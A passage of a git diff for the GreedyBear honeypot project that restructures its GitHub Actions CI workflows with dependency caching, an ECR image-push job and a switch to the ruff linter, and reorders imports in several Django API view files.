+        description: Use postgres service
         type: boolean
         required: false
-      use_mongo:
-        description: Use mongo service
-        default: false
+      use_rabbitmq:
+        description: Use rabbitmq service
         type: boolean
         required: false
-      use_celery:
-        description: Create a celery worker
-        default: false
+      use_redis:
+        description: Use redis service
         type: boolean
         required: false
 
-      use_coverage:
-        description: Use coverage.py.
-        default: false
-        type: boolean
+      # Services configs
+      ## Celery service configs
+      celery_app:
+        description: Celery app name. Requires use_celery to be true
+        type: string
         required: false
-      coverage_config_path:
-        description: Path to the coverage.py config file
+      celery_queues:
+        description: Celery queues separated by ,. Requires use_celery to be true
         type: string
         required: false
-        default: .coveragerc
-      upload_coverage:
-        description: Upload coverage.py report to github
-        default: false
-        type: boolean
+        default: default
+      ## Elasticsearch service configs
+      elasticsearch_version:
+        description: Elasticsearch container version
+        type: string
         required: false
-
-      tags_for_slow_tests:
-        description: Tags for tests that will be run only on master/main branch, space separated. Can be used only for django projects.
-        default: slow
+        default: latest
+      elasticsearch_port:
+        description: Elasticsearch container port
         type: string
         required: false
-      tags_for_manual_tests:
-        description: Tags for tests that will not be run on the CI, space separated. Can be used only for django projects.
-        default: manual
+        default: 9200
+      ## Memcached service configs
+      memcached_version:
+        description: Memcached alpine container version
         type: string
         required: false
-
+        default: latest
+      ## Mongo service configs
+      mongo_version:
+        description: Mongo container version
+        type: string
+        required: false
+        default: latest
+      ## Postgres service configs
       postgres_db:
         description: Postgres service db. Requires use_postgres to be true
         type: string
@@ -184,66 +183,63 @@ on:
         type: string
         required: false
         default: latest
-
-      mongo_version:
-        description: Mongo container version
+      ## RabbitMQ service configs
+      rabbitmq_version:
+        description: RabbitMQ management-alpine container version
         type: string
         required: false
         default: latest
-      elasticsearch_version:
-        description: Elasticsearch container version
+      ## Redis service configs
+      redis_version:
+        description: Redis alpine container version
         type: string
         required: false
-        default: 8.11.1
-      elasticsearch_port:
-        description: Elasticsearch container port
+        default: latest
+      
+
+      # Django configs
+      django_settings_module:
+        description: Path to the django settings file
         type: string
         required: false
-        default: 9200
-      memcached_version:
-        description: Memcached alpine container version
-        type: string
+      check_migrations:
+        description: Check if migrations are valid. Require django_settings_module to be set.
+        type: boolean
         required: false
-        default: latest
-      redis_version:
-        description: Redis alpine container version
-        type: string
+      check_requirements_licenses:
+        description: Check if requirements have a valid license. Require django_settings_module to be set.
+        type: boolean
         required: false
-        default: latest
-      rabbitmq_version:
-        description: RabbitMQ management-alpine container version
+        default: true
+      ignore_requirements_licenses_regex:
+        description: Regex of repositories of which ignore license
         type: string
         required: false
-        default: 3
-
-      celery_app:
-        description: Celery app name. Requires use_celery to be true
+        default: uWSGI.*|lunardate.*|.*QuokkaClient.*|pyquokka.*
+      tags_for_slow_tests:
+        description: Tags for tests that will be run only on master/main branch, space separated. Can be used only for django projects.
+        default: slow
         type: string
         required: false
-
-      celery_queues:
-        description: Celery queues separated by ,. Requires use_celery to be true
+      tags_for_manual_tests:
+        description: Tags for tests that will not be run on the CI, space separated. Can be used only for django projects.
+        default: manual
         type: string
         required: false
-        default: default
 
-      env:
-        description: Environment variables to set
+      # Misc configs
+      custom_command:
+        description: String of custom command to run
         type: string
         required: false
-        default: >-
-          {}
 
-      max_timeout:
-        description: Max time that the CI can be run
-        type: number
+      check_docs_directory:
+        description: Check docs using rstcheck inside this directory
+        type: string
         required: false
-        default: 30
-
-      ubuntu_version:
-        description: Ubuntu version to use
+      check_dockerfile:
+        description: Check dockerfile build. WARNING action total time may increase significantly
         type: string
-        default: latest
         required: false
 
 jobs:
@@ -257,10 +253,11 @@ jobs:
         language: ['python']
     env: ${{ fromJson(inputs.env) }}
     steps:
-      - uses: actions/checkout@v4
+      - name: Check out latest commit
+        uses: actions/checkout@v4
 
       - name: Set up Python
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
         with:
           python-version: ${{ matrix.python_version }}
 
@@ -276,21 +273,133 @@ jobs:
         shell:
           bash
 
-      - name: Install apt requirements
-        if: inputs.packages_path
-        uses: ./.github/actions/apt_requirements
+      - name: Restore APT cache related to PR event
+        id: restore_apt_cache_pr
+        uses: ./.github/actions/apt_requirements/restore_apt_cache
+        with:
+          apt_requirements_file_path: ${{ inputs.packages_path }}
+      
+      - name: Restore APT cache related to target branch
+        id: restore_apt_cache_target_branch
+        if: steps.restore_apt_cache_pr.outputs.cache-hit != 'true'
+        uses: ./.github/actions/apt_requirements/restore_apt_cache
+        with:
+          apt_requirements_file_path: ${{ inputs.packages_path }}
+          git_reference: ${{ github.base_ref }}
+      
+      - name: Refresh APT repositories
+        if: >
+          steps.restore_apt_cache_pr.outputs.cache-hit != 'true' &&
+          steps.restore_apt_cache_target_branch.outputs.cache-hit != 'true'
+        run: |
+          sudo apt-get update
+        shell: bash
+
+      - name: Install APT requirements
+        run: |
+          sudo apt-get install -y --no-install-recommends $(tr '\n' ' ' < ${{ inputs.packages_path }})
+        shell: bash
+      
+      - name: Save APT cache related to PR event
+        if: >
+          steps.restore_apt_cache_pr.outputs.cache-hit != 'true'
+        uses: ./.github/actions/apt_requirements/save_apt_cache
         with:
-          requirements_file: ${{ inputs.packages_path }}
+          apt_requirements_file_path: ${{ inputs.packages_path }}
+
+      - name: Create linter requirements file
+        uses: ./.github/actions/python_requirements/create_linter_requirements_file
+        with:
+          install_from: ${{ inputs.install_from }}
+          django_settings_module: ${{ inputs.django_settings_module }}
+          use_autoflake: ${{ inputs.use_autoflake }}
+          use_bandit: ${{ inputs.use_bandit }}
+          use_black: ${{ inputs.use_black }}
+          use_flake8: ${{ inputs.use_flake8 }}
+          use_isort: ${{ inputs.use_isort }}
+          use_pylint: ${{ inputs.use_pylint }}
+          use_ruff_formatter: ${{ inputs.use_ruff_formatter }}
+          use_ruff_linter: ${{ inputs.use_ruff_linter }}
+
+      - name: Create dev requirements file
+        uses: ./.github/actions/python_requirements/create_dev_requirements_file
+        with:
+          install_from: ${{ inputs.install_from }}
+          use_coverage: ${{ inputs.use_coverage }}
+
+      - name: Create docs requirements file
+        uses: ./.github/actions/python_requirements/create_docs_requirements_file
+        with:
+          install_from: ${{ inputs.install_from }}
+          check_docs_directory: ${{ inputs.check_docs_directory }}
+          django_settings_module: ${{ inputs.django_settings_module }}
+
+      - name: Restore Python virtual environment related to PR event
+        id: restore_python_virtual_environment_pr
+        uses: ./.github/actions/python_requirements/restore_virtualenv/
+        with:
+          requirements_paths: "${{ inputs.requirements_path }} requirements-linters.txt requirements-dev.txt requirements-docs.txt"
+
+      - name: Restore Python virtual environment related to target branch
+        id: restore_python_virtual_environment_target_branch
+        if: steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true'
+        uses: ./.github/actions/python_requirements/restore_virtualenv/
+        with:
+          requirements_paths: ${{ inputs.requirements_path }}
+          git_reference: ${{ github.base_ref }}
+
+      - name: Create Python virtual environment
+        if: >
+         steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' && 
+         steps.restore_python_virtual_environment_target_branch.outputs.cache-hit != 'true'
+        uses: ./.github/actions/python_requirements/create_virtualenv
+
+      - name: Restore pip cache related to PR event
+        id: restore_pip_cache_pr
+        if: > 
+          steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' && 
+          steps.restore_python_virtual_environment_target_branch.outputs.cache-hit != 'true'
+        uses: ./.github/actions/python_requirements/restore_pip_cache
+
+      - name: Restore pip cache related to target branch
+        id: restore_pip_cache_target_branch
+        if: >
+          steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' &&
+          steps.restore_python_virtual_environment_target_branch.outputs.cache-hit != 'true' &&
+          steps.restore_pip_cache_pr.outputs.cache-hit != 'true'
+        uses: ./.github/actions/python_requirements/restore_pip_cache
+        with:
+          git_reference: ${{ github.base_ref }}
+      
+      - name: Install project requirements
+        if: >
+          steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' &&
+          steps.restore_python_virtual_environment_target_branch.outputs.cache-hit != 'true'
+        run: pip install -r ${{ inputs.requirements_path }}
+        shell: bash
+        working-directory: ${{ inputs.install_from }}
+
+      - name: Install other requirements
+        if: >
+          steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true'
+        run: |
+          pip install -r requirements-dev.txt
+          pip install -r requirements-linters.txt
+          pip install -r requirements-docs.txt
+        shell: bash
+        working-directory: ${{ inputs.install_from }}
 
       - name: Check requirements licenses
-        if: inputs.check_requirements_licenses && steps.cache-virtualenv.outputs.cache-hit != 'true'
+        if: >
+            inputs.check_requirements_licenses && 
+            steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true'
         id: license_check_report
         continue-on-error: true
         uses: pilosus/action-pip-license-checker@v2
         with:
           requirements: ${{ inputs.install_from }}/${{ inputs.requirements_path }}
           exclude: ${{ inputs.ignore_requirements_licenses_regex }}
-          table-headers: true
+          headers: true
           fail: 'StrongCopyleft,NetworkCopyleft,Error'
           fails-only: true
 
@@ -304,102 +413,30 @@ jobs:
           exit 1
         shell: bash
 
-      # not the best solution because i do not think that dependabot supports this
-      - name: Create requirements-linters.txt
-        run: |
-          echo > requirements-linters.txt
-
-          if [[ '${{ inputs.use_black}}' != 'false' ]]; then
-            echo "black==23.11.0" >> requirements-linters.txt
-          fi
-
-          if [[ '${{ inputs.use_isort}}' != 'false' ]]; then
-            echo "isort==5.12.0" >> requirements-linters.txt
-          fi
-
-          if [[ '${{ inputs.use_flake8}}' != 'false' ]]; then
-            echo "flake8==6.1.0" >> requirements-linters.txt
-            if [[ -n '${{ inputs.django_settings_module }}' ]]; then
-              echo "flake8-django==1.4" >> requirements-linters.txt
-            fi
-          fi
-
-          if [[ '${{ inputs.use_pylint}}' != 'false' ]]; then
-            echo "pylint==2.17.7" >> requirements-linters.txt
-            if [[ -n '${{ inputs.django_settings_module }}' ]]; then
-              echo "pylint-django==2.5.5" >> requirements-linters.txt
-            fi
-          fi
-
-          if [[ '${{ inputs.use_bandit}}' != 'false' ]]; then
-            echo "bandit==1.7.5" >> requirements-linters.txt
-          fi
-          if [[ '${{ inputs.use_autoflake}}' != 'false' ]]; then
-            echo "autoflake==2.2.1" >> requirements-linters.txt
-          fi
-          cat $(echo ${{ inputs.requirements_path }} | sed -e 's/.txt/-linter.txt/') >> requirements-linters.txt 2>/dev/null || exit 0
-        shell: bash
-        working-directory: ${{ inputs.install_from }}
-
-      - name: Create requirements-dev.txt
-        run: |
-          echo > requirements-dev.txt
-          if [[ '${{ inputs.use_coverage }}' != 'false' ]]; then
-            echo "coverage>=7.3.2" >> requirements-dev.txt
-          fi
-          cat $(echo ${{ inputs.requirements_path }} | sed -e 's/.txt/-dev.txt/') >> requirements-dev.txt 2>/dev/null || exit 0
-        shell: bash
-        working-directory: ${{ inputs.install_from }}
-
-      - name: Create requirements-docs.txt
-        run: |
-          echo > requirements-docs.txt
-          if [[ -n '${{ inputs.check_docs_directory }}' ]]; then
-            echo "rstcheck[sphinx]" >> requirements-docs.txt 
-            echo "sphinx==7.2.6" >> requirements-docs.txt
-            echo "sphinx_rtd_theme==1.3.0" >> requirements-docs.txt
-            echo "sphinxcontrib-spelling==8.0.0" >> requirements-docs.txt
-            if [[ -n '${{ inputs.django_settings_module }}' ]]; then
-              echo "sphinxcontrib-django2==1.9" >> requirements-docs.txt
-            fi
-            cat $(echo ${{ inputs.requirements_path }} | sed -e 's/.txt/-docs.txt/') >> requirements-docs.txt 2>/dev/null || exit 0 
-          fi
-        shell: bash
-        working-directory: ${{ inputs.install_from }}
-
-      - name: Check virtualenv cache
-        uses: syphar/restore-virtualenv@v1
-        id: cache-virtualenv
+      - name: Save Python virtual environment related to PR event
+        if: >
+          steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true'
+        uses: ./.github/actions/python_requirements/save_virtualenv
         with:
-          requirement_files: |
-            ${{ inputs.install_from }}/${{ inputs.requirements_path }}
-            ${{ inputs.install_from }}/requirements-dev.txt
-            ${{ inputs.install_from }}/requirements-linters.txt
-            ${{ inputs.install_from }}/requirements-docs.txt
-
-      - name: Check pip cache
-        uses: syphar/restore-pip-download-cache@v1
-        if: steps.cache-virtualenv.outputs.cache-hit != 'true'
-        with:
-          requirement_files: |
-            ${{ inputs.install_from }}/${{ inputs.requirements_path }}
-            ${{ inputs.install_from }}/requirements-dev.txt
-            ${{ inputs.install_from }}/requirements-linters.txt
-            ${{ inputs.install_from }}/requirements-docs.txt
-
-      - name: Install requirements
-        if: steps.cache-virtualenv.outputs.cache-hit != 'true'
-        run: |
-          pip install -r ${{ inputs.requirements_path }}
-          pip install -r requirements-dev.txt
-          pip install -r requirements-linters.txt
-          pip install -r requirements-docs.txt
-        shell: bash
-        working-directory: ${{ inputs.install_from }}
+          requirements_paths: "${{ inputs.requirements_path }} requirements-linters.txt requirements-dev.txt requirements-docs.txt"
+
+      - name: Save pip cache related to PR event
+        if: >
+          steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' &&
+          steps.restore_pip_cache_pr.outputs.cache-hit != 'true'
+        uses: ./.github/actions/python_requirements/save_pip_cache
 
       - name: Run linters
         uses: ./.github/actions/python_linter
-        if: inputs.use_black || inputs.use_isort || inputs.use_flake8 || inputs.use_pylint || inputs.use_bandit || inputs.use_autoflake
+        if: > 
+          inputs.use_black ||
+          inputs.use_isort ||
+          inputs.use_flake8 ||
+          inputs.use_pylint ||
+          inputs.use_bandit ||
+          inputs.use_autoflake ||
+          inputs.use_ruff_formatter ||
+          inputs.use_ruff_linter
         with:
           working_directory: ${{ inputs.working_directory }}
           use_black: ${{ inputs.use_black }}
@@ -408,6 +445,8 @@ jobs:
           use_pylint: ${{ inputs.use_pylint }}
           use_bandit: ${{ inputs.use_bandit }}
           use_autoflake: ${{ inputs.use_autoflake }}
+          use_ruff_formatter: ${{ inputs.use_ruff_formatter }}
+          use_ruff_linter: ${{ inputs.use_ruff_linter }}
 
       - name: Run CodeQL
         if: inputs.run_codeql
@@ -424,12 +463,6 @@ jobs:
         shell: bash
         working-directory: ${{ inputs.check_docs_directory }}
 
-      - name: Build DockerFile
-        if: inputs.check_dockerfile
-        run: |
-           docker build -f ${{ inputs.check_dockerfile }} .
-        working-directory: ${{ inputs.working_directory }}
-
       - name: Start services
         uses: ./.github/actions/services
         if: inputs.use_postgres || inputs.use_elastic_search || inputs.use_memcached ||  inputs.use_redis || inputs.use_rabbitmq || inputs.use_mongo
diff --git a/.github/workflows/_release_and_tag.yml b/.github/workflows/_release_and_tag.yml
index acc8181f..92bf029e 100644
--- a/.github/workflows/_release_and_tag.yml
+++ b/.github/workflows/_release_and_tag.yml
@@ -31,11 +31,40 @@ on:
         required: false
         default: #CyberSecurity
 
+      publish_on_ecr:
+        description: Publish on ecr
+        type: boolean
+        required: false
+        default: false
+      repository:
+        description: Repository name
+        type: string
+        required: false
+        default: ${{ github.event.repository.name }}
+
+      dockerfiles:
+        description: Path for dockerfiles from working directory
+        type: string
+        required: false
+      working_directory:
+        description: Docker build context
+        type: string
+        required: false
+        default: .
+      aws_region:
+        description: Aws region
+        type: string
+        required: false
+        default: eu-central-1
+
+
 jobs:
   release_and_tag:
     name: Create release and tag
     runs-on: ubuntu-latest
-    if: github.event.pull_request.merged == true && ( github.base_ref == 'master' || github.base_ref == 'main' )
+    if: github.event.pull_request.merged == true
+    outputs:
+      match: ${{ steps.check-tag.outputs.match }}
     steps:
       - uses: actions/checkout@v4
         with:
@@ -43,6 +72,7 @@ jobs:
 
       - name: Check Tag
         id: check-tag
+        if: github.base_ref == 'master' || github.base_ref == 'main'
         run: |
           if [[ "${{ github.event.pull_request.title }}" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
             echo "match=true" >> $GITHUB_OUTPUT
@@ -51,7 +81,7 @@ jobs:
       - name: Create Tag and Release
         id: create-release
         if: steps.check-tag.outputs.match == 'true'
-        uses: softprops/action-gh-release@v1
+        uses: softprops/action-gh-release@v2
         with:
           tag_name: ${{ github.event.pull_request.title }}
           name: Version ${{ github.event.pull_request.title }}
@@ -67,7 +97,7 @@ jobs:
         with:
           fetch-depth: 0 # otherwise, you do not retrieve the tags
 
-      - uses: actions/setup-python@v4
+      - uses: actions/setup-python@v5
         if: steps.check-tag.outputs.match == 'true' && (inputs.publish_on_pypi || inputs.publish_on_test_pypi)
         with:
           python-version: "3.x"
@@ -115,4 +145,42 @@ jobs:
           api_key: ${{ secrets.TWITTER_API_KEY }}
           api_key_secret: ${{ secrets.TWITTER_API_KEY_SECRET }}
           access_token: ${{ secrets.TWITTER_ACCESS_TOKEN }}
-          access_token_secret: ${{ secrets.TWITTER_ACCESS_TOKEN_SECRET }}
\ No newline at end of file
+          access_token_secret: ${{ secrets.TWITTER_ACCESS_TOKEN_SECRET }}
+
+
+  push_on_ecr:
+    runs-on: ubuntu-latest
+    needs: release_and_tag
+    if: github.event.pull_request.merged == true && inputs.publish_on_ecr == true
+    strategy:
+      matrix:
+        dockerfile: ${{ fromJson(inputs.dockerfiles) }}
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0 # otherwise, you do not retrieve the tags
+      - name: Push on ecr branch
+        uses: ./.github/actions/push_on_ecr
+        if: github.base_ref == 'master' || github.base_ref == 'main' || github.base_ref == 'develop' || github.base_ref == 'dev'
+        with:
+          repository: ${{ inputs.repository }}
+          aws_account_id: ${{ secrets.AWS_ACCOUNT_ID }}
+          aws_access_key: ${{ secrets.AWS_ACCESS_KEY}}
+          aws_secret_access_key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+          dockerfile: ${{ matrix.dockerfile }}
+          image_tag: ${{ ( github.base_ref == 'main' || github.base_ref == 'master' )  && 'prod' || 'stag' }}
+          aws_region: ${{ inputs.aws_region }}
+          working_directory: ${{ inputs.working_directory }}
+
+      - name: Push on ecr new release
+        if: needs.release_and_tag.outputs.match == 'true' && (github.base_ref == 'master' || github.base_ref == 'main' )
+        uses: ./.github/actions/push_on_ecr
+        with:
+          repository: ${{ inputs.repository }}
+          aws_account_id: ${{ secrets.AWS_ACCOUNT_ID }}
+          aws_access_key: ${{ secrets.AWS_ACCESS_KEY}}
+          aws_secret_access_key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+          dockerfile: ${{ inputs.dockerfile }}
+          image_tag: ${{ github.event.pull_request.title }}
+          aws_region: ${{ inputs.aws_region }}
+          working_directory: ${{ inputs.working_directory }}
\ No newline at end of file
diff --git a/.github/workflows/create_apt_cache.yaml b/.github/workflows/create_apt_cache.yaml
new file mode 100644
index 00000000..9bd5fd73
--- /dev/null
+++ b/.github/workflows/create_apt_cache.yaml
@@ -0,0 +1,38 @@
+name: Create APT cache
+
+# GitHub will remove any cache entries that have not been accessed in over 7 days.
+
+on: 
+  push:
+    branches:
+      - main
+      - master
+      - develop
+      - dev
+    paths:
+      # Path to APT requirements file
+      - '.github/test/python_test/packages.txt'
+
+# discard previous execution if you commit to a branch that is already running
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  create-cache:
+    name: Create cache for APT dependencies
+    runs-on: ubuntu-latest
+    steps:
+      - name: Check out latest commit on current branch
+        uses: actions/checkout@v4
+
+      # Remember to set the same APT requirements file path set before!
+      - name: Install APT dependencies
+        run: |
+          sudo apt-get update
+          sudo apt-get -y install  --no-install-recommends $(tr '\n' ' ' < .github/test/python_test/packages.txt)
+      
+      - name: Save APT cache
+        uses: ./.github/actions/apt_requirements/save_apt_cache
+        with:
+          apt_requirements_file_path: .github/test/python_test/packages.txt
diff --git a/.github/workflows/create_python_cache.yaml b/.github/workflows/create_python_cache.yaml
new file mode 100644
index 00000000..8db85f48
--- /dev/null
+++ b/.github/workflows/create_python_cache.yaml
@@ -0,0 +1,55 @@
+name: Create Python cache
+
+# GitHub will remove any cache entries that have not been accessed in over 7 days.
+
+# Only project dependencies will be cached here
+
+on:
+  push:
+    branches:
+      - main
+      - master
+      - develop
+      - dev
+    paths:
+      - '.github/test/python_test/requirements.txt'
+
+# discard previous execution if you commit to a branch that is already running
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  create-python-cache:
+    name: Create cache for Python dependencies
+    runs-on: ubuntu-latest
+    steps:
+      - name: Check out latest commit
+        uses: actions/checkout@v4
+
+      # Uncomment only if necessary
+      #- name: Install system dependencies required by Python packages
+      #  run: |
+      #        sudo apt-get update && sudo apt install <package1> <package2>...
+
+      - name: Set up Python
+        uses: actions/setup-python@v5
+        with:
+          python-version: "3.12"
+
+      - name: Set up Python virtual environment
+        uses: ./.github/actions/python_requirements/create_virtualenv
+
+      - name: Install Python dependencies
+        run: |
+          pip install -r .github/test/python_test/requirements.txt
+        working-directory: "."
+
+      - name: Save pip cache
+        uses: ./.github/actions/python_requirements/save_pip_cache
+
+      - name: Create virtual environment cache
+        uses: ./.github/actions/python_requirements/save_virtualenv
+        with:
+          requirements_paths: .github/test/python_test/requirements.txt
+
diff --git a/.github/workflows/pull_request_automation.yml b/.github/workflows/pull_request_automation.yml
index 1ff60d09..0f85421e 100644
--- a/.github/workflows/pull_request_automation.yml
+++ b/.github/workflows/pull_request_automation.yml
@@ -19,6 +19,7 @@ jobs:
       frontend_directories: frontend
       ubuntu_version: latest
 
+
   frontend-tests:
     needs: detect-changes
     if: ${{ needs.detect-changes.outputs.frontend > 0 }}
@@ -39,9 +40,9 @@ jobs:
       use_coverage: true
       upload_coverage: true
       max_timeout: 15
-      ubuntu_version: 22.04
       node_versions: >-
         ["20"]
+      ubuntu_version: latest
 
 
   backend-tests:
@@ -52,14 +53,17 @@ jobs:
      with:
       working_directory: .
 
-      use_black: true
-      use_isort: true
-      use_flake8: true
+      use_black: false
+      use_isort: false
+      use_flake8: false
       use_pylint: false
       use_bandit: false
       use_autoflake: false
+      use_ruff_formatter: true
+      use_ruff_linter: true
 
       requirements_path: requirements/project-requirements.txt
+      packages_path: packages.txt
       django_settings_module: greedybear.settings
 
       check_migrations: true
@@ -74,6 +78,7 @@ jobs:
       use_memcached: false
       use_elastic_search: false
       use_rabbitmq: true
+      rabbitmq_version: "4"
       use_mongo: false
       use_celery: false
 
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 4987b889..7288a8c9 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -20,3 +20,9 @@ jobs:
       publish_on_test_pypi: false
       publish_on_npm: false
       publish_on_twitter: false
+      publish_on_ecr: false
+      repository: certego-test
+      working_directory: .github/test/python_test
+      dockerfiles: >-
+        ["Dockerfile"]
+      aws_region: eu-central-1
diff --git a/.gitignore b/.gitignore
index 46689f15..9e56261b 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,3 +7,6 @@ __pycache__/
 mlmodels/
 # JetBrains IDEs (PyCharm, IntelliJ, etc.)
 .idea/
+# Ruff cache
+.ruff_cache/
+
diff --git a/README.md b/README.md
index aca875b9..9b25f59e 100644
--- a/README.md
+++ b/README.md
@@ -6,8 +6,7 @@
 [![Twitter Follow](https://img.shields.io/twitter/follow/intel_owl?style=social)](https://twitter.com/intel_owl)
 [![Linkedin](https://img.shields.io/badge/LinkedIn-0077B5?style=flat&logo=linkedin&logoColor=white)](https://www.linkedin.com/company/intelowl/)
 
-[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)
-[![Imports: isort](https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336)](https://pycqa.github.io/isort/)
+[![Ruff](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json)](https://github.com/astral-sh/ruff)
 [![CodeQL](https://github.com/intelowlproject/GreedyBear/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/intelowlproject/GreedyBear/actions/workflows/codeql-analysis.yml)
 [![Dependency Review](https://github.com/intelowlproject/GreedyBear/actions/workflows/dependency_review.yml/badge.svg)](https://github.com/intelowlproject/GreedyBear/actions/workflows/dependency_review.yml)
 [![Pull request automation](https://github.com/intelowlproject/GreedyBear/actions/workflows/pull_request_automation.yml/badge.svg)](https://github.com/intelowlproject/GreedyBear/actions/workflows/pull_request_automation.yml)
diff --git a/api/serializers.py b/api/serializers.py
index 63aa694a..83b9da1a 100644
--- a/api/serializers.py
+++ b/api/serializers.py
@@ -3,9 +3,10 @@
 from functools import cache
 
 from django.core.exceptions import FieldDoesNotExist
+from rest_framework import serializers
+
 from greedybear.consts import REGEX_DOMAIN, REGEX_IP
 from greedybear.models import IOC, GeneralHoneypot
-from rest_framework import serializers
 
 logger = logging.getLogger(__name__)
 
diff --git a/api/urls.py b/api/urls.py
index ec341bcd..7202fc10 100644
--- a/api/urls.py
+++ b/api/urls.py
@@ -1,5 +1,8 @@
 # This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
 # See the file 'LICENSE' for copying permission.
+from django.urls import include, path
+from rest_framework import routers
+
 from api.views import (
     StatisticsViewSet,
     command_sequence_view,
@@ -10,8 +13,6 @@
     feeds_pagination,
     general_honeypot_list,
 )
-from django.urls import include, path
-from rest_framework import routers
 
 # Routers provide an easy way of automatically determining the URL conf.
 router = routers.DefaultRouter(trailing_slash=False)
diff --git a/api/views/command_sequence.py b/api/views/command_sequence.py
index 5e75e019..964fc57c 100644
--- a/api/views/command_sequence.py
+++ b/api/views/command_sequence.py
@@ -2,17 +2,22 @@
 # See the file 'LICENSE' for copying permission.
 import logging
 
-from api.views.utils import is_ip_address, is_sha256hash
 from certego_saas.apps.auth.backend import CookieTokenAuthentication
 from django.conf import settings
 from django.http import Http404, HttpResponseBadRequest
-from greedybear.consts import GET
-from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
 from rest_framework import status
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+    api_view,
+    authentication_classes,
+    permission_classes,
+)
 from rest_framework.permissions import IsAuthenticated
 from rest_framework.response import Response
 
+from api.views.utils import is_ip_address, is_sha256hash
+from greedybear.consts import GET
+from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
+
 logger = logging.getLogger(__name__)
 
 
@@ -51,7 +56,7 @@ def command_sequence_view(request):
 
     if is_ip_address(observable):
         sessions = CowrieSession.objects.filter(source__name=observable, start_time__isnull=False, commands__isnull=False)
-        sequences = set(s.commands for s in sessions)
+        sequences = {s.commands for s in sessions}
         seqs = [
             {
                 "time": s.start_time,
@@ -62,7 +67,7 @@ def command_sequence_view(request):
         ]
         related_iocs = IOC.objects.filter(cowriesession__commands__in=sequences).distinct().only("name")
         if include_similar:
-            related_clusters = set(s.cluster for s in sequences if s.cluster is not None)
+            related_clusters = {s.cluster for s in sequences if s.cluster is not None}
             related_iocs = IOC.objects.filter(cowriesession__commands__cluster__in=related_clusters).distinct().only("name")
         if not seqs:
             raise Http404(f"No command sequences found for IP: {observable}")
diff --git a/api/views/cowrie_session.py b/api/views/cowrie_session.py
index 7c0b5299..8fcffcfd 100644
--- a/api/views/cowrie_session.py
+++ b/api/views/cowrie_session.py
@@ -4,17 +4,22 @@
 import logging
 import socket
 
-from api.views.utils import is_ip_address, is_sha256hash
 from certego_saas.apps.auth.backend import CookieTokenAuthentication
 from django.conf import settings
 from django.http import Http404, HttpResponseBadRequest
-from greedybear.consts import GET
-from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
 from rest_framework import status
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+    api_view,
+    authentication_classes,
+    permission_classes,
+)
 from rest_framework.permissions import IsAuthenticated
 from rest_framework.response import Response
 
+from api.views.utils import is_ip_address, is_sha256hash
+from greedybear.consts import GET
+from greedybear.models import CommandSequence, CowrieSession, Statistics, viewType
+
 logger = logging.getLogger(__name__)
 
 
@@ -89,8 +94,8 @@ def cowrie_session_view(request):
         return HttpResponseBadRequest("Query must be a valid IP address or SHA-256 hash")
 
     if include_similar:
-        commands = set(s.commands for s in sessions if s.commands)
-        clusters = set(cmd.cluster for cmd in commands if cmd.cluster is not None)
+        commands = {s.commands for s in sessions if s.commands}
+        clusters = {cmd.cluster for cmd in commands if cmd.cluster is not None}
         related_sessions = CowrieSession.objects.filter(commands__cluster__in=clusters).prefetch_related("source", "commands")
         sessions = sessions.union(related_sessions)
 
@@ -100,9 +105,9 @@ def cowrie_session_view(request):
     if settings.FEEDS_LICENSE:
         response_data["license"] = settings.FEEDS_LICENSE
 
-    unique_commands = set(s.commands for s in sessions if s.commands)
+    unique_commands = {s.commands for s in sessions if s.commands}
     response_data["commands"] = sorted("\n".join(cmd.commands) for cmd in unique_commands)
-    response_data["sources"] = sorted(set(s.source.name for s in sessions), key=socket.inet_aton)
+    response_data["sources"] = sorted({s.source.name for s in sessions}, key=socket.inet_aton)
     if include_credentials:
         response_data["credentials"] = sorted(set(itertools.chain(*[s.credentials for s in sessions])))
     if include_session_data:
diff --git a/api/views/enrichment.py b/api/views/enrichment.py
index 1c49e5d9..3eca1741 100644
--- a/api/views/enrichment.py
+++ b/api/views/enrichment.py
@@ -2,15 +2,20 @@
 # See the file 'LICENSE' for copying permission.
 import logging
 
-from api.serializers import EnrichmentSerializer
 from certego_saas.apps.auth.backend import CookieTokenAuthentication
-from greedybear.consts import GET
-from greedybear.models import Statistics, viewType
 from rest_framework import status
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+    api_view,
+    authentication_classes,
+    permission_classes,
+)
 from rest_framework.permissions import IsAuthenticated
 from rest_framework.response import Response
 
+from api.serializers import EnrichmentSerializer
+from greedybear.consts import GET
+from greedybear.models import Statistics, viewType
+
 logger = logging.getLogger(__name__)
 
 
diff --git a/api/views/feeds.py b/api/views/feeds.py
index 34a1bda4..617df2ac 100644
--- a/api/views/feeds.py
+++ b/api/views/feeds.py
